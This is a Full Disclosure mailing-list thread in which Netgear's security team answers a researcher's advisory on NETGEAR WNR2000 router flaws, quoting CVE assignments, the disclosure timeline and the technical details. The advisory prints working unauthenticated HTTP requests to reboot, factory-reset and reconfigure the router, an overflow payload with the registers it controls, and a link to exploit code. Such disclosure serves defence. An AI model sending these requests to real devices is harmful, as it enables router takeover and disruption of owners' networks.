[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: Re: [FD] [0-day] RCE and admin credential disclosure in NETGEAR WNR2000
From: Netgear Security <security () netgear ! com>
Date: 2017-01-30 17:22:55
Message-ID: MWHPR06MB2878E0A8BE0EF2C16EE89026F14B0 () MWHPR06MB2878 ! namprd06 ! prod ! outlook ! com
[Download RAW message or body]
Hello Pedro,
We have noted the CVEs within our internal records and will update the kb accordingly. Thank \
you for letting us know.
If you have time, are you able to verify the firmware remediates the vulnerability? Thank you \
for taking the time to continue to research this vulnerability. We appreciate all of the hard \
work you have put in to make Netgear's products more secure for everyone.
NETGEAR's mission is to be the innovative leader in connecting the world to the internet. To \
achieve this mission, we strive to earn and maintain the trust of our users that we will \
protect the privacy and security of their data.
We take all security concerns brought forth seriously and are constantly monitoring the latest \
threats. Being pro-active rather than re-active to emerging security issues is a fundamental \
belief at NETGEAR. Every day new security issues and attack vectors are created. NETGEAR \
strives to keep abreast on the latest state-of-the-art security developments by working with \
security researchers and companies. We appreciate the community's efforts in creating a more \
secure world.
If you have any questions or comments with regard to this information, please contact us at: \
security@netgear.com.
Sincerely,
Product Security Incident Response Team
Netgear, Inc
-----Original Message-----
From: Pedro Ribeiro [mailto:pedrib@gmail.com]
Sent: Monday, January 30, 2017 2:01 AM
To: fulldisclosure@seclists.org; bugtraq@securityfocus.com
Cc: CVE ID Requests; CVE Request; Netgear Security
Subject: Re: [0-day] RCE and admin credential disclosure in NETGEAR WNR2000
An update on this post:
MITRE has provided me with CVE numbers.
CVE-2016-10175 for #1 (information disclosure)
CVE-2016-10176 for #2 (improper access control)
CVE-2016-10174 for #3 (stack buffer overflow)
In addition, NETGEAR has recognised the flaw and released beta firmware that is supposed to fix \
this vulnerability. This claim was NOT verified. The beta firmware can be downloaded from:
http://kb.netgear.com/000036549/Insecure-Remote-Access-and-Command-Execution-Security-Vulnerability?cid=wmt_netgear_organic
Regards,
Pedro
On 20/12/16 21:42, Pedro Ribeiro wrote:
> Hi,
>
> tl;dr
> RCE in NETGEAR WNR2000 routers, exploitable over the LAN by default or
> over the WAN if remote administration is enabled.
> 10.000 devices affected show up in Shodan - these are the ones with
> remote admin enabled. There are likely tens of thousands of vulnerable
> routers in private LANs as this device is extremely popular.
>
> As usual, NETGEAR did not respond to any of my emails, so I'm
> releasing this advisory and exploit code as a 0-day.
> See [1] for the exploit code, but bear in mind it is only "alpha"
> quality. A more robust exploit will be released in the next week and
> sent upstream to Metasploit.
>
> MITRE has not assigned any CVE numbers yet but I will keep trying to
> get them. If they are not obtained then this vulnerability should be
> referred with the BID / BugTraq number that will be assigned to it.
>
> A copy of the advisory is in
> https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear
> -wnr2000.txt
>
> Regards,
> Pedro
>
> > > Stack buffer overflow vulnerability in NETGEAR WNR2000 router
> > > Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information
> Security
> ======================================================================
> ====
> Disclosure: 20/12/2016 / Last updated: 20/12/2016
>
> > > Background on the affected products:
> "Wirelessly connect all of your computers and mobile devices. N300
> WiFi speed lets you simultaneously download, stream music and video,
> and game online. NETGEAR genie ® makes it easy to setup and monitor your network.
> Parental controls keep your Internet experience safe and secure."
>
>
> > > Summary:
> The NETGEAR WNR2000 allows an administrator to perform a number of
> sensitive functions in the web interface through an apparent CGI
> script named apply.cgi. This script is invoked when changing Internet
> settings, WLAN settings, restore to factory defaults, reboot the router, etc.
> However apply.cgi is not really a script, but a function that is
> invoked in the HTTP server (uhttpd) when it receives that string in the URL.
> When reversing uhttpd, it was found that it also allows an
> unauthenticated user to perform the same sensitive admin functions if
> apply_noauth.cgi is invoked instead.
> Some of the functions, such as rebooting the router, can be exploited
> straight away by an unauthenticated attacker. Other functions, such as
> changing Internet, WLAN settings or retrieving the administrative
> password, require the attacker to send a "timestamp" variable attached
> to the URL. This timestamp is generated every time the target page is
> accessed and functions as a sort of anti-CSRF token.
> The timestamp generating function was reverse engineered and due to
> incorrect use of random number generation (details below) it is
> possible to identify the token in less than 1000 attempts with no
> other previous knowledge.
>
> By combining this knowledge with an information leakage, it is
> possible to recover the administrator password. This password is then
> used to enable telnet functionality in the router and obtain a root
> shell if the attacker is in the LAN.
>
> Finally, a stack buffer overflow was also discovered, which combined
> with the apply_noauth.cgi vulnerability and the timestamp identifying
> attack allows an unauthenticated attacker to take full control of the
> device and execute code remotely. This vulnerability allows the
> attacker to execute code in the LAN and in the WAN.
>
> It should be noted that the WNR2000v5 does not have remote
> administration enabled by default on the latest firmware, and unless
> the administrator enables it, this attack is only possible in the LAN.
> Only the WNR2000v5 device was tested, but versions 3 and 4 of this
> router should also be vulnerable. At the time of the intial
> disclosure, there are over 10.000 vulnerable routers appearing in a Shodan search.
>
> Exploit code has been released with this advisory, but it is of "alpha"
> quality (see [1]). This exploit code will be improved and ported to
> Metasploit in the next week.
>
>
> > > Technical details:
> #1
> Vulnerability: Information leakage
> NO CVE ASSIGNED
> Attack Vector: Remote
> Constraints: Can be exploited by an unauthenticated attacker. See
> below for other constraints.
> Affected versions:
> - WNR2000v5, all firmware versions (confirmed in hardware)
> - WNR2000v4, all firmware versions possibly affected (confirmed only
> by static analysis)
> - WNR2000v3, all firmware versions possibly affected (confirmed only
> by static analysis)
>
> The device leaks its serial number when performing a request to
> http://<device_web_portal>/BRS_netgear_success.html:
> HTTP/1.0 200 OK
> Server: uhttpd/1.0.0
> Date: Thu, 01 Jan 1970 00:11:42 GMT
> Cache-Control: no-cache
> Pragma: no-cache
> Expires: 0
> Content-Type: text/html; charset="UTF-8"
> Connection: close
>
> <html>
> <head>
> </head>
> <body>
> <script>
> /* 22281: add sn after success href */
> var sn="4D01615V0009D"; <--- serial number of the
> device
> (...)
>
> This vulnerability is useful for further exploitation in #2.
>
>
> #2
> Vulnerability: Improper access control NO CVE ASSIGNED Attack Vector:
> Remote
> Constraints: Can be exploited by an unauthenticated attacker. See
> below for other constraints.
> Affected versions:
> - WNR2000v5, all firmware versions (confirmed in hardware)
> - WNR2000v4, all firmware versions possibly affected (confirmed only
> by static analysis)
> - WNR2000v3, all firmware versions possibly affected (confirmed only
> by static analysis)
>
> -----------------------
> The vulnerability
> -----------------------
>
> The WNR2000 router allows an administrator to perform sensitive
> actions by invoking the apply.cgi URL on the web server of the device.
> This special URL is handled by the embedded web server (uhttpd) and
> processed accordingly.
> While reverse engineering uhttpd, it was discovered that another
> function, apply_noauth.cgi allows an unauthenticated user to perform
> sensitive actions on the device. For example, to reboot the router,
> the following request can be sent:
>
> ====
> POST /apply_noauth.cgi?/reboot_waiting.htm HTTP/1.1
> Host: 192.168.1.1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 26
>
> submit_flag=reboot&yes=Yes
> ====
>
> To reset to factory defaults:
> ====
> POST /apply_noauth.cgi?/pls_wait_factory_reboot.html HTTP/1.1
> Host: 192.168.1.1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 19
>
> submit_flag=factory
> ====
>
> Change WLAN settings:
> ====
> POST /apply_noauth.cgi?/WLG_wireless.htm HTTP/1.1
> Host: 192.168.1.1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 754
>
> submit_flag=wlan&Apply=Apply&hidden_wlan_mode=&hidden_wlan_channel=&ge
> nerate_flag=&old_length=&wl_sec_wpaphrase_len=17&wl_hidden_wpa_psk=som
> ewifipassword&hidden_sec_type=&wep_press_flag=&wpa1_press_flag=0&wpa2_
> press_flag=1&wpas_press_flag=0&wps_change_flag=5&hidden_enable_guestNe
> t=&hidden_enable_ssidbro=&hidden_allow_guest=&radiusServerIP=&opmode_b
> g=&wl_mode=&wl_ssid=1337Net&wl_WRegion=4&wl_hidden_wlan_channel=0&wl_h
> idden_wlan_mode=2&wl_hidden_sec_type=4&hidden_WpaeRadiusSecret=&hidden
> _WpaeRadiusSecret_a=&wl_enable_ssid_broadcast=1&hidden_enable_video=&w
> l_tx_ctrl=&wl_apply_flag=1&ssid_bc=1&ssid=NETGEAR09&wla1ssid=NETGEAR-5
> G_Guest1&wlg1ssid=NETGEAR-Guest&WRegion=4&w_channel=0&opmode=2&opmode5
> 4=1&security_type=WPA2-PSK&passphrase=somewifipassword
> ====
>
> Change password recovery settings for the administrator account:
> ====
> POST /apply_noauth.cgi?/PWD_password.htm%20timestamp=26123148 HTTP/1.1
> Host: 192.168.1.1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 188
>
> submit_flag=passwd&hidden_enable_recovery=1&Apply=Apply&sysOldPasswd=&
> sysNewPasswd=&sysConfirmPasswd=&enable_recovery=on&question1=1&answer1
> =secretanswer1&question2=2&answer2=secretanswer2
> ====
>
> These are just examples, there is a lot more functionality that can be
> accessed using apply_noauth.cgi. However, apart from the three first
> examples, most actions will require knowledge of a "timestamp"
> variable which is appended to the URL (like in the fourth example).
>
>
> #3
> Vulnerability: Stack buffer overflow
> NO CVE ASSIGNED
> Attack Vector: Remote
> Constraints: Can be exploited by an unauthenticated attacker. See
> below for other constraints.
> Affected versions:
> - WNR2000v5, all firmware versions (confirmed in hardware)
> - WNR2000v4, all firmware versions possibly affected (confirmed only
> by static analysis)
> - WNR2000v3, all firmware versions possibly affected (confirmed only
> by static analysis)
>
> -----------------------
> Vulnerability details
> -----------------------
>
> The HTTP server in the device (uhttpd) handles access to *.cgi files
> in a special way. Instead of fetching a CGI file from the file system,
> it handles them internally according to the URL. This mechanism has
> already been described in vulnerability #2 and in the Summary section.
> A key parameter of the apply*.cgi URL is the submit_flag, which will
> determine which uhttpd function will be invoked when processing the request.
>
> If the following request is sent:
> POST /apply.cgi?/lang_check.html%20timestamp=14948715 HTTP/1.1
> Authorization: Basic YWRtaW46cGFzc3dvcmQ=
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 604
>
> submit_flag=select_language&hidden_lang_avi=aaaaaaaaaaaaaaaaaaaaaaaaaa
> aaaaaaaaaaAAAABBBBCCCCDDDDEEEEFFFFbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
> bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
>
> A stack buffer overflow occurs, which can be seen when debugging the
> process in gdb:
> Program received signal SIGSEGV, Segmentation fault.
> 0x45454545 in ?? ()
> (gdb) i r
> zero at v0 v1 a0 a1 a2
> a3
> R0 00000000 00000001 00000000 00000054 00000000 7fae7ee1 ffffff87
> 000009c0
> t0 t1 t2 t3 t4 t5 t6
> t7
> R8 2ab96420 00000000 00000001 fffffff8 fffffffe 00000001 00000000
> 00000000
> s0 s1 s2 s3 s4 s5 s6
> s7
> R16 41414141 42424242 43434343 44444444 00000002 00000025 0000002b
> 00000002
> t8 t9 k0 k1 gp sp s8
> ra
> R24 00000002 2ab5a170 2ab825f8 00000000 0048f4a0 7fae7f18 004b51b8
> 45454545
> status lo hi badvaddr cause pc
> 0000ff13 000f41db 000003dd 45454544 10800008 45454545
> fcsr fir restart
> 00000000 00000000 00000000
> (gdb) x/32xw $sp
> 0x7fae7f18: 0x46464646 0x62626262 0x62626262 0x62626262
> (...)
>
> The following registers can be controlled by an attacker:
> $ra/$pc = index 52 of hidden_lang_avi parameter (EEEE)
> $s0 = index 36 (AAAA)
> $s1 = index 40 (BBBB)
> $s2 = index 44 (CCCC)
> $s3 = index 48 (DDDD)
> $sp = index 56 (FFFF)
>
> This vulnerability will be analysed using firmware 1.0.0.34 for the
> WNR2000v5 router.
>
> > > Fix:
> NETGEAR did not respond to any emails, so THERE IS NO FIX for this
> vulnerability.
> It is recommended to replace this router with another make and model
> that supports OpenWRT firmware.
>
> Timeline of disclosure:
> 26.09.2016: Email sent to NETGEAR (security@netgear.com) asking for
> PGP key, no response.
> 28.10.2016: Email sent to NETGEAR (security@netgear.com) asking for
> PGP key, no response.
> 26.11.2016: Disclosed vulnerability to CERT through their web portal.
> 29.11.2016: Received reply from CERT. They indicated that NETGEAR does
> not cooperate with them, so they recommended getting CVE numbers from
> MITRE and releasing the vulnerability information
> Email to MITRE requesting CVE numbers, no response.
> Email sent to NETGEAR (security@netgear.com) asking for
> PGP key, no response.
> 20.12.2016: Public disclosure.
>
>
> > > References:
> [1]
> https://raw.githubusercontent.com/pedrib/PoC/master/exploits/netgearPw
> n.rb [2] https://wiki.openwrt.org/toh/netgear/telnet.console
> [3] https://github.com/insanid/netgear-telenetenable
> [4]
> http://cdn.imgtec.com/mips-training/mips-basic-training-course/slides/
> Caches.pdf
> [5]
> https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-h
> nap-login.txt
> [6]
> http://cdn.imgtec.com/mips-training/mips-basic-training-course/slides/
> Memory_Map.pdf
>
>
> ================
> Agile Information Security Limited
> http://www.agileinfosec.co.uk/
> > > Enabling secure digital business >>
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic